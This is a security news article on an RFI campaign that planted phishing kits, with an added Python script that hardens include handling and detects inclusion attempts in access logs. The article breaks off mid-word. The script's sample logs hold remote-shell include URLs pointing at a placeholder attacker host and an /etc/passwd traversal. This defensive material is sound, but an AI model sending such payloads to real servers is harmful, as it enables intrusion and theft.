Campaign Leverages RFI Attacks to Deploy Phishing Kits

A recently detected series of targeted attacks is attempting to exploit Remote File Inclusion (RFI) vulnerabilities to deploy phishing kits, Akamai has discovered. 


RFI attacks attempt to exploit file-inclusion functions that act on unchecked or improperly validated input within vulnerable applications or websites. Most of these attacks target PHP, but the same class of vulnerability can also be found in Java, ASP, and elsewhere.


Once an RFI attack succeeds, the server delivers the content of the attacker-controlled, externally referenced file, and this is what was happening as part of the recently discovered attacks as well, Akamai’s Larry Cashdollar reveals.


RFI attacks, the security researcher explains, could also lead to code execution, Cross Site Scripting (XSS), Denial of Service (DoS), or sensitive information disclosure.


The security researcher observed the attack on his own website, where server logs revealed GET requests referencing a remote text file, along with requests attempting to include a remote shell into the application running on the website.
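As an added illustration (not code from the Akamai write-up or from the attacker's kit), the following Python script ties together the two points above: the check a hardened application applies to an include parameter before calling anything like PHP's include(), and the same classification run as detection logic over web-server access logs of the kind the researcher describes. The log lines, IP addresses, hostnames and the ALLOWED_PAGES allowlist are constructed placeholders; `classify_param` generalizes beyond http:// URLs to the other PHP stream wrappers that an unchecked include would accept.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access log lines (placeholder hosts and IPs, not
# from the original article). Lines 2 and 3 reference a remote .txt file, as
# the requests in the researcher's logs did; line 4 is a local traversal.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2019:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2019:10:00:02 +0000] "GET /index.php?page=http://attacker.example/rfi.txt HTTP/1.1" 200 812
203.0.113.9 - - [10/Jan/2019:10:00:03 +0000] "GET /plugins/view.php?file=https://attacker.example/shell.txt HTTP/1.1" 500 0
203.0.113.9 - - [10/Jan/2019:10:00:04 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 0
203.0.113.7 - - [10/Jan/2019:10:00:05 +0000] "GET /index.php?page=contact HTTP/1.1" 200 420
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes/stream wrappers that an include() with unvalidated input would
# resolve. Remote ones only work when PHP's allow_url_include is enabled,
# which is why that directive should stay off; the rest are local wrappers
# that are equally unwanted in a page-name parameter.
URL_WRAPPERS = ("http", "https", "ftp", "ftps", "php", "data", "expect", "phar", "file")

# Hypothetical allowlist of page names the application is willing to include.
ALLOWED_PAGES = {"home", "about", "contact"}


def classify_param(value):
    """Return 'remote' for a URL/wrapper, 'traversal' for path escapes, else 'local'.

    The value is percent-decoded once more than the query parser already did,
    so double-encoded traversal sequences are also caught.
    """
    v = unquote(value)
    m = re.match(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):", v)
    if m and m.group(1).lower() in URL_WRAPPERS:
        return "remote"
    if ".." in v or v.startswith("/") or "\\" in v or "\0" in v:
        return "traversal"
    return "local"


def resolve_include(param, base_dir="/var/www/pages"):
    """The hardened form of an include: only allowlisted names map to files.

    A vulnerable application would instead build the include target straight
    from the parameter; here anything outside the allowlist is refused.
    """
    if classify_param(param) != "local" or param not in ALLOWED_PAGES:
        raise ValueError("refused include target: %r" % param)
    return "%s/%s.php" % (base_dir, param)


def find_rfi_attempts(log_text):
    """Scan access-log lines and report query parameters that look like inclusion attempts."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                kind = classify_param(value)
                if kind == "local":
                    continue
                hits.append({
                    "ip": m.group("ip"),
                    "param": name,
                    "value": unquote(value),
                    "kind": kind,
                    # A 200 on a remote include is worth triage first: it is the
                    # case where the server may have served the attacker's file.
                    "status": int(m.group("status")),
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print("%(ip)s %(kind)s param=%(param)s status=%(status)d value=%(value)s" % hit)
```

The detector only looks at query strings of GET requests, which matches what the server logs above showed; the same `classify_param` check is the one `resolve_include` applies before the application ever touches the filesystem or the network.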


The code in the text file was designed to check whether the server was vulnerable to RFI. If so, the contents of the $SERVER_ADMIN variable would be sent back to the attacker.


The file also included a call to another external txt file, which revealed some information about the attacker, such as their email address, the fact that they favor Portuguese for variable names ($assunto), and confirmation that they are profiling servers (it would gather information on which user the HTTP server is running under, such as apache or root).


The researcher also noticed a request to a different text file from the same domain, which contained the necessary code to generate a phishing website targeting a well-k ..
